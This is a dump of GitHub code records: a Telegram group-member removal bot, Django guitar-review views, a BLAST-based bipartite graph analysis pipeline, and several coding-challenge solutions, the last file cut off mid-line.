int(time.split(':')[0]) * 60 + int(time.split(':')[1])\n for name, time in zip(names, times):\n if name not in m:\n m[name] = deque()\n m[name].append(minutes(time))\n for name, times in m.items():\n q = deque()\n for time in sorted(times):\n while len(q) and q[0] + 60 < time:\n q.popleft()\n q.append(time)\n if 3 <= len(q):\n alerts.append(name)\n break\n return sorted(alerts)\n","repo_name":"claytonjwong/leetcode-py","sub_path":"1604_alert_same_name_3_times_per_hour.py","file_name":"1604_alert_same_name_3_times_per_hour.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41934849246","text":"import asyncio\nimport logging\nimport os\nfrom datetime import datetime, timedelta\n\nimport uvloop\nfrom pyrogram import Client, filters\nfrom pyrogram.enums import ChatType, ChatMemberStatus\nfrom pyrogram.errors import FloodWait\nfrom pyrogram.types import Message, InlineKeyboardMarkup, InlineKeyboardButton\n\nlogging.basicConfig(level=logging.WARNING, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\n\nAPI_ID = int(os.getenv(\"API_ID\"))\nAPI_HASH = os.getenv(\"API_HASH\")\nBOT_TOKEN = os.getenv(\"BOT_TOKEN\")\n\nuvloop.install()\n\nbot = Client(name=\"kickmemberbot\", api_id=API_ID, api_hash=API_HASH, bot_token=BOT_TOKEN)\n\nlogging.warning(\"⚡️ Bot Started!\")\n\n\n@bot.on_message(filters.command(\"start\") & filters.private)\nasync def start_bot(cl: Client, m: Message):\n keyboard = InlineKeyboardMarkup([\n [InlineKeyboardButton(text=\"➕ Add me to a group\",\n url=f\"tg://resolve?domain={cl.me.username}&startgroup=&admin=manage_chat+restrict_members\")],\n [InlineKeyboardButton(text=\"➕ Add me to a channel\",\n url=f\"tg://resolve?domain={cl.me.username}&startchannel&admin=change_info+restrict_members+post_messages\")],\n [InlineKeyboardButton(text=\"📦 Public Repository\", url=\"https://github.com/samuelmarc/kickallmembersbot\")]\n ])\n await m.reply(\n f\"Hello {m.from_user.mention} I am a bot to remove (not ban) all users from your group or channel created by @samuel_ks, below you can add the bot to your group or channel or access the bot's public repository .\",\n reply_markup=keyboard)\n\n\n@bot.on_message(filters.command(\"help\"))\nasync def help_bot(_, m: Message):\n await m.reply(\n \"Need help? To use the bot it's very simple, just add me to your group or channel as an admin and use the /kick_all command and all users will be removed (not banned).\")\n\n\n@bot.on_message(filters.command(\"kick_all\") & (filters.channel | filters.group))\nasync def kick_all_members(cl: Client, m: Message):\n chat = await cl.get_chat(chat_id=m.chat.id)\n my = await chat.get_member(cl.me.id)\n if my.privileges:\n if my.privileges.can_manage_chat and my.privileges.can_restrict_members:\n is_channel = True if m.chat.type == ChatType.CHANNEL else False\n if not is_channel:\n req_user_member = await chat.get_member(m.from_user.id)\n if req_user_member.privileges is None:\n await m.reply(\"❌ You are not admin and cannot execute this command!\")\n return\n kick_count = 0\n members_count = chat.members_count\n if members_count <= 200:\n async for member in chat.get_members():\n if member.user.id == cl.me.id:\n continue\n elif member.status == ChatMemberStatus.ADMINISTRATOR or member.status == ChatMemberStatus.OWNER:\n continue\n try:\n await chat.ban_member(member.user.id, datetime.now() + timedelta(seconds=30))\n kick_count += 1\n except FloodWait as e:\n await asyncio.sleep(e.value)\n await m.reply(f\"✅ Total Users Removed: {kick_count}\")\n else:\n loops_count = members_count / 200\n loops_count = round(loops_count)\n for loop_num in range(loops_count):\n async for member in chat.get_members():\n if member.user.id == cl.me.id:\n continue\n elif member.status == ChatMemberStatus.ADMINISTRATOR or member.status == ChatMemberStatus.OWNER:\n continue\n try:\n await chat.ban_member(member.user.id, datetime.now() + timedelta(seconds=30))\n kick_count += 1\n except FloodWait as e:\n await asyncio.sleep(e.value)\n await asyncio.sleep(15)\n await m.reply(f\"✅ Total Users Removed: {kick_count}\")\n else:\n await m.reply(\"❌ The bot is admin but does not have the necessary permissions!\")\n else:\n await m.reply(\"❌ The bot must have admin!\")\n\n\nbot.run()\n","repo_name":"samuelmarc/kickallmembersbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30876224273","text":"from django.shortcuts import render\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom rest_framework.response import Response\n\n\nfrom base.models import Guitar, Review\nfrom base.serialisers import GuitarSerialiser\n\nfrom rest_framework import status\n\n@api_view(['GET'])\ndef getTopGuitars(request):\n guitars = Guitar.objects.filter(rating__gt=4).order_by('-rating')[0:5]\n serialiser = GuitarSerialiser(guitars, many=True)\n return Response(serialiser.data)\n\n@api_view(['GET'])\ndef getGuitars(request):\n guitars = Guitar.objects.all()\n serialiser = GuitarSerialiser(guitars, many=True)\n return Response(serialiser.data)\n\n@api_view(['GET'])\ndef getGuitar(request, pk):\n guitar = Guitar.objects.get(_id=pk)\n serialiser = GuitarSerialiser(guitar, many=False)\n return Response(serialiser.data)\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef createGuitarReview(request, pk):\n user = request\n guitar = Guitar.objects.get(_id=pk)\n data = request.data\n\n #1 - Review already exists\n alreadyExists = guitar.review_set.filter(user=user).exists()\n\n if alreadyExists:\n content = {'detail': 'Guitar already reviewed'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n #2 - No Rating or 0\n elif data['rating'] == 0:\n content = {'detail': 'Please select a rating'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n\n #3 - Create Review\n else:\n review = Review.objects.create(\n user=user,\n guitar=guitar,\n name=user.first_name,\n rating=data['rating'],\n comment=data['comment'],\n )\n\n reviews = guitar.review_set.all()\n guitar.numReviews = len(reviews)\n\n total = 0\n for i in reviews:\n total += i.rating\n \n guitar.rating = total / len(reviews)\n guitar.save()\n\n return Response('Review Added')","repo_name":"jchesher92/ran-ecommerce","sub_path":"base/views/guitar_views.py","file_name":"guitar_views.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21940436841","text":"#! /usr/bin/python3\n\n\"\"\"\n Written by Eduardo COREL, 2018.\n \n This file is part of multitwin.\n \n multitwin is shared under Creative commons licence: \n \n Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)\n \n See https://creativecommons.org/licenses/by-nc-sa/4.0/\n\"\"\"\n\n##\n# standard libraries -- Version Python 3.5 and higher.\n#\n\nimport sys\nimport os\nimport time\nimport random\nimport argparse\nfrom subprocess import Popen, PIPE\nimport multiprocessing \nfrom igraph import *\n\n##\n# Additional libraries from multitwin\n#\n\nimport utils as ut\nfrom utils import myModule,myTimer,printLog\nimport factorgraph as FG\nimport simplify_graph as SG\nimport detect_twins as DT\nimport description as D\nimport blast_all as BA\n\n## Graphical interface\n\nimport bt_launcher\nimport xmlform\n\n##\n# Local executable definitions\n#\n\nblastDir = os.environ[\"MT_BLAST\"]\ndiamondDir = os.environ[\"MT_DIAMOND\"]\nexonerateDir = os.environ[\"MT_EXONERATE\"]\n\nblastp = os.path.join(blastDir,\"blastp\")\nmakeblastdb = os.path.join(blastDir,\"makeblastdb\")\ndiamond = os.path.join(diamondDir,\"diamond\")\n\ncleanblast = \"cleanblast\"\nFactorGraph = \"factorgraph.py\"\nDetectTwins = \"detect_twins.py\"\nfamilydetector = \"familydetector\"\nshaveGraph = \"simplify_graph.py\"\nDescription = \"description.py\"\n\n##\n# Function definitions\n#\n\ndef runBlast(fastaFile,blastFile):\n \"\"\"Run (multithreaded when possible) BLAST on the fastaFile and output the result with option 6 format as the blastFile\"\"\"\n i0 = time.clock()\n nbCPU = multiprocessing.cpu_count()\n n = nbCPU-2\n tag = random.randint(100000,1000000)\n dbFile = fastaFile+\"_\"+str(tag)+\".db\"\n dbCmd = \"\"\"makeblastdb -in %s -input_type \"fasta\" -dbtype prot -out %s -hash_index\"\"\" % (fastaFile,dbFile)\n proc1 = Popen(args=[dbCmd],shell=True,executable = \"/bin/bash\")\n proc1.communicate()\n blastCmd = \"\"\"%s -i %s -out %s -db %s -th %d -evalue 1e-5\"\"\" % (blastAll,fastaFile,blastFile,dbFile,n)\n try:\n BA.main(inFile=fastaFile,out=blastFile,db=dbFile,th=n)\n except IOError as e:\n printLog(\"Error in %s: %s\\nExiting.\" % (blastCmd,e),handle)\n return()\n cleanCmd = \"\"\"rm %s*\"\"\" % dbFile\n proc3 = Popen(args=[cleanCmd],shell=True,executable = \"/bin/bash\")\n proc3.communicate()\n myTimer(i0,\"Completed runBlast\")\n\ndef runDiamond(fastaFile,blastFile):\n \"\"\"Run DIAMOND on the fastaFile and output the result with option 6 format as the blastFile\"\"\"\n i0 = time.clock()\n tag = random.randint(100000,1000000)\n dbRad = fastaFile+\"_\"+str(tag)\n dbFile = dbRad+\".dmnd\"\n dbCmd = \"\"\"diamond makedb --in %s -d %s\"\"\" % (fastaFile,dbRad)\n proc1 = Popen(args=[dbCmd],shell=True,executable = \"/bin/bash\")\n proc1.communicate()\n diaCmd = \"\"\"diamond blastp -d %s -q %s -o %s -f 6 qseqid sseqid evalue pident bitscore qstart qend qlen sstart send slen --more-sensitive\"\"\" % (dbRad,fastaFile,blastFile)\n proc2 = Popen(args=[diaCmd],shell=True,executable = \"/bin/bash\")\n proc2.communicate()\n cleanCmd = \"\"\"rm %s*\"\"\" % dbFile\n proc3 = Popen(args=[cleanCmd],shell=True,executable = \"/bin/bash\")\n proc3.communicate()\n myTimer(i0,\"Completed runDiamond\")\n\ndef runDescription(annotFile,radical=None,ID=None,keyList=None,handle=sys.stderr,config=None):\n \"\"\"Compute the result of Description.py on the trailFile hierarchy with basis the annotFile.\"\"\"\n if not ID:\n ID = \"UniqID\"\n if keyList:\n keyString = \",\".join(keyList)\n descFile = radical+\".desc\"\n xmlFile = radical+\".xml_desc\"\n configFile = radical+\".config\"\n trailFile = radical+\".trail\"\n edgeFile = radical+\".edges\"\n compFile = radical+\".twin_comp\"\n #cmd8 = \"\"\"%s -i %s -o %s -X %s -a -D -c %s -k %s -H %s %s %s\"\"\" % (Description,ID,descFile,configFile,compFile,keyString,trailFile,edgeFile,annotFile)\n cmd8 = \"\"\"%s -i %s -o %s -X %s -a -D -c %s -H %s %s %s\"\"\" % (Description,ID,descFile,configFile,compFile,trailFile,edgeFile,annotFile)\n printLog(\"--------------------------------------------------\\nConfiguring %s\" % cmd8,handle)\n try:\n if config:\n D.Main(edgeFile,annotFile,nodeID=ID,outFile=descFile,X=configFile,restrAnnot=True,display=False,comp=compFile,hist=trailFile,keyList=keyString,log=handle)\n else:\n D.Main(edgeFile,annotFile,nodeID=ID,outFile=descFile,X=configFile,restrAnnot=True,display=True,comp=compFile,hist=trailFile,keyList=keyString,log=handle)\n except IOError as e:\n printLog(\"Error in %s: %s\\nExiting.\" % (cmd8,e),handle)\n return()\n #time.sleep(15)\n if config:\n xmlform.main(xmlFile=configFile)\n cmd8bis = \"\"\"%s -i %s -o %s -O %s -x %s -a -H %s %s %s\"\"\" % (Description,ID,descFile,xmlFile,configFile,trailFile,edgeFile,annotFile)\n printLog(\"--------------------------------------------------\\nRunning %s\" % cmd8bis,handle)\n try:\n D.Main(edgeFile,annotFile,nodeID=ID,outFile=descFile,Xout=xmlFile,x=configFile,restrAnnot=True,display=True,hist=trailFile,keyList=keyList,log=handle)\n except IOError as e:\n printLog(\"Error in %s: %s\\nExiting.\" % (cmd8bis,e),handle)\n return()\n\ndef getArticulationPoints(edgeFile):\n \"\"\"Returns a description of biconnected components of the graph edgeFile.\"\"\"\n g = Graph.Read_Ncol(edgeFile,directed=False)\n bic,aps = g.biconnected_components(return_articulation_points=True)\n art = []\n for node in aps:\n art.append(g.vs[node]['name'])\n bi_comp = []\n for comp in bic:\n COMP = []\n for node in comp:\n COMP.append(g.vs[node]['name'])\n bi_comp.append(COMP)\n bi_comp.sort(key=len)\n bi_comp.reverse()\n BIC = dict(zip(range(len(bi_comp)),bi_comp))\n COMP = defaultdict(list)\n for cID in BIC:\n for node in BIC[cID]:\n COMP[node].append(cID)\n return(art,COMP)\n\ndef completeAnalysis(geneNetwork,genome2sequence,n,c,a=None,clustType=None,UniqID=None,sep=None,keyList=None,handle=sys.stderr,config=None):\n \"\"\"Perform complete bipartite and twin analysis at a given identity threshold n\"\"\"\n directory = \"graphs\"+str(n)\n try:\n os.mkdir(directory)\n except OSError:\n pass\n # Names and file definitions\n if clustType == 'cc':\n seqCompFile = \"CC.nodes\" # compFile for sequences\n eFile = \"CC.edges\"\n iFile = \"CC.info\"\n elif clustType == 'families':\n seqCompFile = \"family.nodes\" # compFile for sequences\n eFile = \"family.edges\"\n iFile = \"family.info\"\n else:\n sys.exit(\"Bad clustering type -- see -C option\")\n edgeFile = \"graph.edges\" # edgeFile\n trailFile = \"graph.trail\" # trailFile\n geneNetworkDico = geneNetwork+\".dico\"\n geneNetworkGenes = geneNetwork+\".genes\"\n ## ==============================\n # c) assemble sequence families by computing the connected components\n cmd2 = \"\"\"%s -i %s -d %s -n %s -m %s -p %d\"\"\" % (familydetector,geneNetwork,directory,geneNetworkGenes,clustType,n)\n printLog(\"--------------------------------------------------\\nRunning %s\" % cmd2,handle)\n proc2 = Popen(args=[cmd2],shell=True,stdout=PIPE,executable = \"/bin/bash\")\n out = proc2.communicate()[0]\n printLog(out.decode('utf-8'),handle)\n mySeqCompFile = os.path.join(directory,seqCompFile)\n myiFile = os.path.join(directory,iFile)\n myeFile = os.path.join(directory,eFile)\n # renumber back families through geneNetworkDico\n dic1 = ut.loadMapping(geneNetworkDico)\n dic2 = ut.node2communityFasta(mySeqCompFile,sep=sep)\n compDict = ut.composeDict(dic1,dic2)\n ut.outputDict(compDict,mySeqCompFile,sep=sep)\n cleanCmd = \"\"\"rm %s %s\"\"\" % (myiFile,myeFile)\n procClean = Popen(args=[cleanCmd],shell=True,executable = \"/bin/bash\")\n procClean.communicate()\n ## B) from the sequence families to the bipartite graph\n # a) Cluster sequence families and quotient the graph\n cmd3 = \"\"\"%s -c %s -k %s -d %s %s %s %s\"\"\" % (FactorGraph,mySeqCompFile,UniqID,directory,genome2sequence,edgeFile,trailFile)\n printLog(\"--------------------------------------------------\\nRunning %s\" % cmd3,handle)\n FG.Main(edgeFile=genome2sequence,outEdgeFile=edgeFile,outTrailFile=trailFile,direct=directory,community=mySeqCompFile,comm_id=UniqID,sep=sep,log=handle,header=cmd3)\n os.chdir(directory)\n printLog(\"--------------------------------------------------\\ncd %s\" % directory,handle)\n ##\n rad = \"graph0\"\n # b) Remove the degree one nodes from the sequence side\n edges = rad+\".edges\"\n cmd4 = \"\"\"%s -d 1 -u 2 %s %s\"\"\" % (shaveGraph,edgeFile,edges)\n printLog(\"--------------------------------------------------\\nRunning %s\" % cmd4,handle)\n SG.Main(edgeFile=edgeFile,outEdgeFile=edges,degree=1,nodeType=2,sep=sep,log=handle)\n # d) Compute twins and twin supports of the bipartite graph\n twins = rad+\".twins\"\n twinComp = rad+\".twin_comp\"\n cmd6 = \"\"\"%s -o %s -u 2 -c %s %s \"\"\" % (DetectTwins,twins,twinComp,edges)\n printLog(\"--------------------------------------------------\\nRunning %s\" % cmd6,handle)\n try:\n DT.Main(edgeFile=edges,outFile=twins,sep=sep,unilat='2',comp=twinComp,log=handle)\n except IOError as e:\n printLog(\"Error in %s: %s\\nExiting.\" % (cmd6,e),handle)\n return()\n ## C) from the bipartite graph to the twins and articulation points\n # a) twin quotienting\n twinDir = \"TwinQuotient\"\n try:\n os.mkdir(twinDir)\n except OSError:\n pass\n rad = \"graph1\"\n newEdges = rad+\".edges\"\n newTrail = rad+\".trail\"\n cmd7 = \"\"\"%s -c %s -k %s -d %s -t %s %s %s %s\"\"\" % (FactorGraph,twins,UniqID,twinDir,trailFile,edges,newEdges,newTrail)\n printLog(\"--------------------------------------------------\\nRunning %s\" % cmd7,handle)\n try:\n FG.Main(edgeFile=edges,outEdgeFile=newEdges,outTrailFile=newTrail,direct=twinDir,community=twins,comm_id=UniqID,in_trail=trailFile,sep=sep,log=handle,header=cmd7)\n except IOError as e:\n printLog(\"Error in %s: %s\\nExiting.\" % (cmd7,e),handle)\n return()\n os.chdir(twinDir)\n printLog(\"--------------------------------------------------\\ncd %s\" % twinDir,handle)\n # b) Computing articulation points and biconnected components\n ART,BIC = getArticulationPoints(newEdges)\n artPoints = rad+\".art\"\n aP = open(artPoints,\"w\")\n printLog(\"--------------------------------------------------\\nPrinting %d articulation points in %s\" % (len(ART),artPoints),handle)\n for node in ART:\n outString = \"\"\"%s\\t%s\\n\"\"\" % (node,\",\".join([str(ID) for ID in BIC[node]]))\n aP.write(outString)\n aP.close()\n bcNb = 0\n bicFile = rad+\".bic_comp\"\n bC = open(bicFile,\"w\")\n for node in BIC:\n for ID in BIC[node]:\n bcNb = max(bcNb,ID)\n bC.write(\"\"\"%s\\t%d\\n\"\"\" % (node,ID))\n bC.close()\n printLog(\"--------------------------------------------------\\nPrinting %d biconnected components in %s\" % (bcNb+1,bicFile),handle) \n ## D) annotations and twin component analysis\n if a:\n edges = rad+\".edges\"\n twins = rad+\".twins\"\n twinComp = rad+\".twin_comp\"\n cmd9 = \"\"\"%s -o %s -u 2 -c %s %s \"\"\" % (DetectTwins,twins,twinComp,edges)\n printLog(\"--------------------------------------------------\\nRunning %s\" % cmd9,handle)\n try:\n DT.Main(edgeFile=edges,outFile=twins,sep=sep,unilat='2',comp=twinComp,log=handle)\n except IOError as e:\n printLog(\"Error in %s: %s\\nExiting.\" % (cmd9,e),handle)\n return()\n runDescription(a,radical=rad,ID=UniqID,keyList=keyList,handle=handle,config=config)\n #return()\n \n##\n# Main procedure ====================================================\n#\n\ndef processArgs():\n parser = argparse.ArgumentParser(description='Runs a complete bipartite graph analysis') \n parser.add_argument(\"-b\", \"--blast/diamond_output_file\", dest=\"b\", help=\"Output of BLAST/DIAMOND program\",type=str)\n parser.add_argument(\"-g\", \"--genome_to_gene_file\", dest=\"g\",help=\"Initial bipartite genomeGene file\")\n parser.add_argument(\"-a\", \"--annotation_file\", dest=\"a\", help=\"Annotation file, referenced by UniqID\")\n parser.add_argument(\"-k\", \"--annotation_keys\", dest=\"k\", help=\"Optional list of keys in annotFile to consider (requires option -a -- default All)\",default=None)\n parser.add_argument(\"-n\", \"--identity_threshold\", dest=\"n\", help=\"Threshold(s) for sequence similarity (comma-separated)\",default=\"30,40,50,60,70,80,90,95\")\n parser.add_argument(\"-c\", \"--mutual_cover\", dest=\"c\", help=\"Threshold for reciprocal sequence length cover\",default=80)\n parser.add_argument(\"-C\", \"--clustering_method\", dest=\"C\", help=\"Clustering type for family detection (cc or families)\",default=\"cc\")\n parser.add_argument(\"-I\", \"--input_network\", dest=\"I\", help=\"Skips CleanBlast step with supplied networkFile FILE\")\n parser.add_argument(\"-f\", \"--fasta_file\", dest=\"f\", help=\"Fasta file -- if supplied, then the blast-all will be run first to generate the blastFile.\\nAttention, the supplied blastFile NAME will be used for the output\")\n parser.add_argument(\"-A\", \"--similarity_search_software\", dest=\"A\", help=\"Use ALN (b=BLAST/d=Diamond) sequence comparison program (only with -f option)\",default=\"b\")\n parser.add_argument(\"-i\", \"--unique_node_identifier\", dest=\"i\", help=\"Key identifier (default: UniqID)\",default=\"UniqID\")\n parser.add_argument(\"-K\", \"--graphic_interface_for_Description\", dest=\"K\", action=\"store_true\", help=\"Launch graphical configuration interface for description.py module\")\n parser.add_argument(\"-D\", \"--output_dir\", dest=\"D\", help=\"Store everything under DIR\")\n parser.add_argument(\"-l\", \"--log\", dest=\"l\", help=\"Specify log file\",default=sys.stderr)\n parser.add_argument(\"-s\", \"--separator\", dest=\"s\", help=\"Field separator (default '\\\\t')\",default=\"\\t\")\n parser.add_argument(\"-G\", \"--graphical\", dest=\"G\", action=\"store_true\", help=\"Launch graphical interface\")\n return(parser)\n\ndef Main(blastFile=None,genome2sequence=None,sep=None,thr=None,cov=None,in_network=None,fasta=None,aln=None,clust=None,annot=None,key=None,keyList=None,log=None,directory=None,config=None):\n \"\"\" Main program \"\"\"\n ###\n try:\n startWD = os.path.abspath(os.path.dirname(blastFile))\n except:\n startWD = os.path.abspath(os.getcwd())\n os.chdir(startWD)\n if directory:\n rootDir = os.path.abspath(directory)\n if not os.path.exists(rootDir):\n os.makedirs(rootDir)\n else:\n rootDir = os.getcwd()\n if log != sys.stderr:\n log = os.path.join(rootDir,log)\n ### Argument processing =============================================================================================================\n if not blastFile or not genome2sequence:\n sys.exit(\"Required files %s and %s\" % (\"blastFile\",\"genome2sequence\"))\n blastFile = os.path.abspath(blastFile)\n genome2sequence = os.path.abspath(genome2sequence)\n ThresholdList = list(map(int,thr.strip().split(\",\")))\n cover = float(cov)\n print(\"Starting directory: %s\" % startWD)\n print(\"Root directory: %s\" % rootDir)\n if fasta:\n if aln == \"b\":\n runBlast(fasta,blastFile)\n elif aln == \"d\":\n runDiamond(fasta,blastFile)\n else:\n sys.exit(\"Wrong sequence comparison option -- use (b) for BLAST - (d) for DIAMOND\")\n UniqID = key\n ## Filename definitions =============================================================================================================\n if in_network:\n geneNetwork = os.path.abspath(in_network)\n else:\n geneNetwork = blastFile+\".cleanNetwork\"\n if annot:\n annot = os.path.abspath(os.path.join(startWD,annot))\n if keyList:\n keyList = keyList.split(\",\")\n else:\n with open(annot,'r') as ANNOT:\n keyList = ANNOT.readline().strip().split(sep)[1:]\n else:\n annot = None\n keyList = None\n ## Corps du programme ===========================================\n inext = time.clock()\n os.chdir(rootDir)\n ## A) from the blast output to the sequence families\n # a) filter self-hits and keep only best hit\n if not in_network:\n cmd1 = \"%s -n 1 -i %s\" % (cleanblast,blastFile) # the output are three files named blastFile\".cleanNetwork\", blastFile\".cleanNetwork.dico\" and blastFile\".cleanNetwork.genes\" \n printLog(\"--------------------------------------------------\\nRunning %s\" % cmd1,log)\n proc1 = Popen(args=[cmd1],shell=True,stdout=PIPE,executable = \"/bin/bash\")\n out = proc1.communicate()[0]\n printLog(out.decode('utf-8'),log)\n # b) perform complete analysis for each threshold\n for n in ThresholdList:\n STR = \"\"\"--------------------------------------------------\\nSimilarity threshold %d%%\"\"\" % n\n printLog(STR,log)\n completeAnalysis(geneNetwork,genome2sequence,n,cover,a=annot,clustType=clust,UniqID=key,sep=sep,keyList=keyList,handle=log,config=config)\n os.chdir(rootDir)\n ## Fin ======================================================\n prog = myModule()\n if prog == \"__main__.py\":\n prog = sys.argv[0].split(\"/\")[-1]\n ## Sortie ======================================================\n return()\n\n#========= Main program\n\nif __name__ == '__main__':\n prog = sys.argv[0].split(\"/\")[-1]\n parser = processArgs()\n args = parser.parse_args()\n CMD = \" \".join(sys.argv)\n #printLog(CMD,args.l)\n #print(vars(args))\n if not args.G:\n Main(blastFile=args.b,genome2sequence=args.g,sep=args.s,thr=args.n,cov=args.c,in_network=args.I,\\\n fasta=args.f,aln=args.A,clust=args.C,annot=args.a,key=args.i,keyList=args.k,log=args.l,directory=args.D,config=args.K)\n else:\n bt_launcher.main(prog,args)\n","repo_name":"TeamAIRE/MultiTwin","sub_path":"python-scripts/bitwin.py","file_name":"bitwin.py","file_ext":"py","file_size_in_byte":17879,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"30130077277","text":"\"\"\"\r\nCreate a function that sums the total number of digits between two numbers,\n**inclusive**. For example, between the numbers `19` and `22` we have:\n\n # 19, 20, 21, 22\n (1 + 9) + (2 + 0) + (2 + 1) + (2 + 2) = 19\n\n### Examples\n\n sum_digits(7, 8) ➞ 15\n \n sum_digits(17, 20) ➞ 29\n \n sum_digits(10, 12) ➞ 6\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef sum_digits(a, b):\n ov_total = 0\n for x in range(a, b+1):\n total = 0\n for digit in str(x):\n total += int(digit)\n ov_total += total\n return ov_total\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"kmruefq3dhdqxtLeM_6.py","file_name":"kmruefq3dhdqxtLeM_6.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37571459341","text":"#!/usr/local/bin/python3\n\"\"\"migratory birds hackerrank solution\n \"\"\"\nimport os\n\n#\n# Complete the 'migratoryBirds' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts INTEGER_ARRAY arr as parameter.\n#\n\n\ndef migratory_birds(birds_sighted):\n \"\"\"migratory birds\n\n Args:\n arr (int[]): birds sighted\n\n Returns:\n int: lowest type id of the most frequently sighted birds\n \"\"\"\n max_freq = 0\n max_occuring_bird_with_smallest_id = birds_sighted[0]\n\n for unique_bird in set(birds_sighted):\n freq = birds_sighted.count(unique_bird)\n if freq > max_freq:\n max_freq = freq\n max_occuring_bird_with_smallest_id = unique_bird\n elif freq == max_freq and unique_bird < max_occuring_bird_with_smallest_id:\n max_occuring_bird_with_smallest_id = unique_bird\n\n return max_occuring_bird_with_smallest_id\n\n\nif __name__ == '__main__':\n with open(os.environ['OUTPUT_PATH'], 'w', encoding='utf-8') as fptr:\n\n arr_count = int(input().strip())\n\n arr = list(map(int, input().rstrip().split()))\n\n result = migratory_birds(arr)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"Deyems/hacker-rank-solves","sub_path":"migratory_birds/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10066596698","text":"import sys\nimport pandas as pd\nfrom collections import defaultdict\n\n\nsys_byteorder = ('>', '<')[sys.byteorder == 'little']\n\nply_dtypes = dict([\n (b'int8', 'i1'),\n (b'char', 'i1'),\n (b'uint8', 'u1'),\n (b'uchar', 'b1'),\n (b'uchar', 'u1'),\n (b'int16', 'i2'),\n (b'short', 'i2'),\n (b'uint16', 'u2'),\n (b'ushort', 'u2'),\n (b'int32', 'i4'),\n (b'int', 'i4'),\n (b'uint32', 'u4'),\n (b'uint', 'u4'),\n (b'float32', 'f4'),\n (b'float', 'f4'),\n (b'float64', 'f8'),\n (b'double', 'f8')\n])\n\nvalid_formats = {'ascii': '', 'binary_big_endian': '>',\n 'binary_little_endian': '<'}\n\n\ndef read_ply(filename):\n \"\"\" Read a .ply (binary or ascii) file and store the elements in pandas DataFrame\n Parameters\n ----------\n filename: str\n Path to the filename\n Returns\n -------\n data: dict\n Elements as pandas DataFrames; comments and ob_info as list of string\n \"\"\"\n\n with open(filename, 'rb') as ply:\n\n if b'ply' not in ply.readline():\n raise ValueError('The file does not start whith the word ply')\n # get binary_little/big or ascii\n fmt = ply.readline().split()[1].decode()\n # get extension for building the numpy dtypes\n ext = valid_formats[fmt]\n\n line = []\n dtypes = defaultdict(list)\n count = 2\n points_size = None\n mesh_size = None\n has_texture = False\n comments = []\n while b'end_header' not in line and line != b'':\n line = ply.readline()\n\n if b'element' in line:\n line = line.split()\n name = line[1].decode()\n size = int(line[2])\n if name == \"vertex\":\n points_size = size\n elif name == \"face\":\n mesh_size = size\n\n elif b'property' in line:\n line = line.split()\n # element mesh\n if b'list' in line:\n\n if b\"vertex_indices\" in line[-1] or b\"vertex_index\" in line[-1]:\n mesh_names = [\"n_points\", \"v1\", \"v2\", \"v3\"]\n else:\n has_texture = True\n mesh_names = [\"n_coords\"] + [\"v1_u\", \"v1_v\", \"v2_u\", \"v2_v\", \"v3_u\", \"v3_v\"]\n\n if fmt == \"ascii\":\n # the first number has different dtype than the list\n dtypes[name].append(\n (mesh_names[0], ply_dtypes[line[2]]))\n # rest of the numbers have the same dtype\n dt = ply_dtypes[line[3]]\n else:\n # the first number has different dtype than the list\n dtypes[name].append(\n (mesh_names[0], ext + ply_dtypes[line[2]]))\n # rest of the numbers have the same dtype\n dt = ext + ply_dtypes[line[3]]\n\n for j in range(1, len(mesh_names)):\n dtypes[name].append((mesh_names[j], dt))\n else:\n if fmt == \"ascii\":\n dtypes[name].append(\n (line[2].decode(), ply_dtypes[line[1]]))\n else:\n dtypes[name].append(\n (line[2].decode(), ext + ply_dtypes[line[1]]))\n\n elif b'comment' in line:\n line = line.split(b\" \", 1)\n comment = line[1].decode().rstrip()\n comments.append(comment)\n\n count += 1\n\n # for bin\n end_header = ply.tell()\n\n data = {}\n\n if comments:\n data[\"comments\"] = comments\n\n if fmt == 'ascii':\n top = count\n bottom = 0 if mesh_size is None else mesh_size\n\n names = [x[0] for x in dtypes[\"vertex\"]]\n\n data[\"points\"] = pd.read_csv(filename, sep=\" \", header=None, engine=\"python\",\n skiprows=top, skipfooter=bottom, usecols=names, names=names)\n\n for n, col in enumerate(data[\"points\"].columns):\n data[\"points\"][col] = data[\"points\"][col].astype(\n dtypes[\"vertex\"][n][1])\n\n if mesh_size :\n top = count + points_size\n\n names = np.array([x[0] for x in dtypes[\"face\"]])\n usecols = [1, 2, 3, 5, 6, 7, 8, 9, 10] if has_texture else [1, 2, 3]\n names = names[usecols]\n\n data[\"mesh\"] = pd.read_csv(\n filename, sep=\" \", header=None, engine=\"python\", skiprows=top, usecols=usecols, names=names)\n\n for n, col in enumerate(data[\"mesh\"].columns):\n data[\"mesh\"][col] = data[\"mesh\"][col].astype(\n dtypes[\"face\"][n + 1][1])\n\n else:\n with open(filename, 'rb') as ply:\n ply.seek(end_header)\n points_np = np.fromfile(ply, dtype=dtypes[\"vertex\"], count=points_size)\n if ext != sys_byteorder:\n points_np = points_np.byteswap().newbyteorder()\n data[\"points\"] = pd.DataFrame(points_np)\n if mesh_size:\n mesh_np = np.fromfile(ply, 